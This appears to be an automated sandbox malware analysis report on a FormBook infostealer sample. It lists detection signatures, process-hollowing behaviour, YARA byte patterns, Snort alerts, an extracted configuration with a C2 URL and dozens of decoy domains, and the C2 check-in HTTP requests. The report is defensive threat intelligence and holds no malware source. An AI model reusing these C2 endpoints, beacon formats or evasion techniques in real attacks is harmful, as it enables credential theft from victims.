
Analysis Report TazxfJHRhq.exe

Overview

General Information

Sample Name: TazxfJHRhq.exe
Analysis ID: 383852
MD5: f818665dd48a93c48255d3ceadf92a6e
SHA1: 2567c8a3e1a3e3e98782ea8d0d117518ccd4291b
SHA256: 6bb8fa14bf9c650a67541ffedff2e3f1c055454b90489653c95aa39284d7eb92
Tags: exe, Formbook

Most interesting Screenshot:

Detection

Threat: FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Contains functionality to prevent local Windows debugging
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a Windows Living Off The Land Binaries (LOL bins)
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • TazxfJHRhq.exe (PID: 4736 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
    • TazxfJHRhq.exe (PID: 5940 cmdline: 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F818665DD48A93C48255D3CEADF92A6E)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cmstp.exe (PID: 4064 cmdline: C:\Windows\SysWOW64\cmstp.exe MD5: 4833E65ED211C7F118D4A11E6FB58A09)
          • cmd.exe (PID: 5948 cmdline: /c del 'C:\Users\user\Desktop\TazxfJHRhq.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(19 collapsed entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
1.2.TazxfJHRhq.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.TazxfJHRhq.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(13 collapsed entries not shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://www.theholisticbirthco.com/evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Source: http://www.jcernadas.com/evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Source: http://www.usinggroovefunnels.com/evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu | Avira URL Cloud: Label: malware
Found malware configuration
Source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.autotrafficbot.com/evpn/"], "decoy": ["memoriesmade-l.com", "babypowah.com", "usinggroovefunnels.com", "qapjv.com", "kp031.com", "kinfet.com", "markmalls.com", "keithforemandesigns.com", "fydia.com", "jesussaysalllivesmatter.com", "sarachavesportela.com", "standerup.com", "monthlywifi.com", "productsoffholland.com", "newbieadvice.com", "globalnetworkautomation.com", "theholisticbirthco.com", "physicalrobot.com", "thesouthernhomesellers.com", "teamcounteract.com", "icomplementi.com", "jsmsheetmetal.com", "jcernadas.com", "del-tekzen.com", "alekseeva-center.info", "arunkapur.com", "gregismyrealestateagent.com", "soalfintech.com", "notrecondourbania.com", "alum2alum.network", "gototaku.com", "moneymakeideas.com", "dbdcontractlngllc.com", "tor-one.com", "walgreenlitigation.com", "votestephaniezarb.com", "washathome.club", "zhuledao.com", "sonyjewls.com", "oncologyacademe.com", "kuppers.info", "cgpizza.net", "glgshopbd.com", "dodson4tulare.com", "mishtifarmers.com", "a1-2c.com", "oligan-gs.com", "countrysidehomeinvestors.com", "bpro.swiss", "fodiyo.com", "playelementsgame.com", "melhorquesantander.com", "jamessicilia.com", "abundancewithmelissaharvey.com", "vatandoost.com", "curiosityisthecurebook.com", "o8y8.com", "de-knutselkeet.com", "advisorsonecall.com", "homerangeopen.com", "brusselsdesignproject.com", "0449888.com", "psychicsjaneholden.com", "b-sphere.com"]}
Multi AV Scanner detection for submitted file
Source: TazxfJHRhq.exe | Virustotal: Detection: 14%
Source: TazxfJHRhq.exe | ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476907995.0000000000C90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.214771183.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248915082.00000000005F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.248684354.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.476715752.0000000000930000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.TazxfJHRhq.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.TazxfJHRhq.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 1.2.TazxfJHRhq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.4af7960.5.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.1.TazxfJHRhq.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.TazxfJHRhq.exe.27a0000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.cmstp.exe.6bd538.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: TazxfJHRhq.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: cmstp.pdbGCTL | source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdbUGP | source: TazxfJHRhq.exe, 00000000.00000003.210529727.000000001EF00000.00000004.00000001.sdmp, TazxfJHRhq.exe, 00000001.00000002.249342255.0000000000B6F000.00000040.00000001.sdmp, cmstp.exe, 00000004.00000002.478158487.00000000045C0000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb | source: TazxfJHRhq.exe, cmstp.exe
Source: Binary string: cmstp.pdb | source: TazxfJHRhq.exe, 00000001.00000002.248968735.0000000000629000.00000004.00000020.sdmp
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405301 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00405C94 SetErrorMode,SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_004026BC FindFirstFileA,
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop ebx
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop ebx
Source: C:\Windows\SysWOW64\cmstp.exe | Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49745 -> 192.185.48.194:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49747 -> 52.58.78.16:80
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.autotrafficbot.com/evpn/
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1 | Host: www.jamessicilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1 | Host: www.kinfet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=0M6ZQgL8IcDyCwomro3oU0+S4lgLLFgc0WEYasg9Je1ZokoU9qr9vbqVIYlP2JKTB372&w4=jFNp36Ihu HTTP/1.1 | Host: www.productsoffholland.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=KkWhScBkby78tLALzdAz8CnCjb47jVkq+/iIMgqrMbFUrtE+6VX7P3g+12tQT1WZakud&w4=jFNp36Ihu HTTP/1.1 | Host: www.markmalls.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=eugAyVbFjTGCbHTU5QCJaxOKGF+rVHXRgES2jcHdoUQlFxVgByKSQwjGascFDT08oG3Y&w4=jFNp36Ihu HTTP/1.1 | Host: www.zhuledao.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=vuWMxfkh+6vmXF1oy+zIqCJtkAbujMYD9B0ur5oCOxuFSx86Hqk4MPW+e95bZxU45kLf&w4=jFNp36Ihu HTTP/1.1 | Host: www.jcernadas.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=x0ZJTajXylflf9w1AOLp4z6MEeP0j5bmDWx3E2oNmzw2lecwih58OZgaRC+Q9k1hI2JG&w4=jFNp36Ihu HTTP/1.1 | Host: www.theholisticbirthco.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=MYo3qtR4MoTJM9eEEEQJY+2owLrirHbqorePLbwYxji+asNtirv2kfx8Flc200WiuFJj&w4=jFNp36Ihu HTTP/1.1 | Host: www.tor-one.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=SbzT885gMwI0SrecOCVR7+X63g3QiQnq4cO3Mq/wdHuk7Bui5+S2HJ4sI04qlEXUDlVA&w4=jFNp36Ihu HTTP/1.1 | Host: www.de-knutselkeet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=rbKZoqFNxKUJa45rmf723j5e1+/Af1Vmd22uFdYYwCe+W7Lpy/kHCEK0lxAuMCiY39Cm&w4=jFNp36Ihu HTTP/1.1 | Host: www.autotrafficbot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=lIAMQw8Bc5WvbtZzc5MVHUptsiPc1Sl8tBJqhUvlbuUAA7ypaYYvmQWduCHy/+CL3sQ0&w4=jFNp36Ihu HTTP/1.1 | Host: www.curiosityisthecurebook.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytNF&w4=jFNp36Ihu HTTP/1.1 | Host: www.usinggroovefunnels.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=uC/MtWgv+YrXZeFWxw8c+UMLGaJCPPY/UiwLcWwP6A/e3Dk62IKxdmGhKI0+YBSelN0N&w4=jFNp36Ihu HTTP/1.1 | Host: www.cgpizza.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=mJ1WicGgYxGiPfNmi48PwwH9NxkuMiIXMjFvraRfIBMfYxjrtIxgIRAmB9RzgRW7JS2o&w4=jFNp36Ihu HTTP/1.1 | Host: www.physicalrobot.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=fhrZBjxaI0WDrOMMLB9i/eTcrXrQxugx+jgojm7BAd6fBe64JiOWliSCzfUjPirJzJCm&w4=jFNp36Ihu HTTP/1.1 | Host: www.jamessicilia.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /evpn/?JDK8ix=tTQY57yJV1PB58vhZsfw1idcR39uzoBhuFhBLA0LfuUY3fYfkSmldauzSZkrcgPEdi+f&w4=jFNp36Ihu HTTP/1.1 | Host: www.kinfet.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View | IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View | ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View | ASN Name: GD-EMEA-DC-CGN1DE GD-EMEA-DC-CGN1DE
Source: Joe Sandbox View | ASN Name: ANONYMIZEEpikNetworkCH ANONYMIZEEpikNetworkCH
Source: unknown | DNS traffic detected: queries for: www.jamessicilia.com
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Thu, 08 Apr 2021 09:10:22 GMT | Content-Type: text/html | Content-Length: 153 | Connection: close | Server: nginx/1.16.1 | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://bitly.ws/9qZUevpn/?JDK8ix=ISts4gbMhqyuTmKrSHZmognB97NvFE2BZp5yYtc0d8I84ULtNRTPjTWlODLK7CpkytN
Source: explorer.exe, 00000003.00000000.237042288.000000000F674000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://www.physicalrobot.com
Source: cmstp.exe, 00000004.00000002.479835773.0000000004C72000.00000004.00000001.sdmp | String found in binary or memory: http://www.physicalrobot.com/
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000003.00000000.233379152.0000000008B46000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 0_2_00404EA0 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,lstrlenA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 00000001.00000002.248893172.00000000005C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.219806845.00000000027A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.475251727.0000000000400000.00000040.00000001.sdmp, type: MEMORY
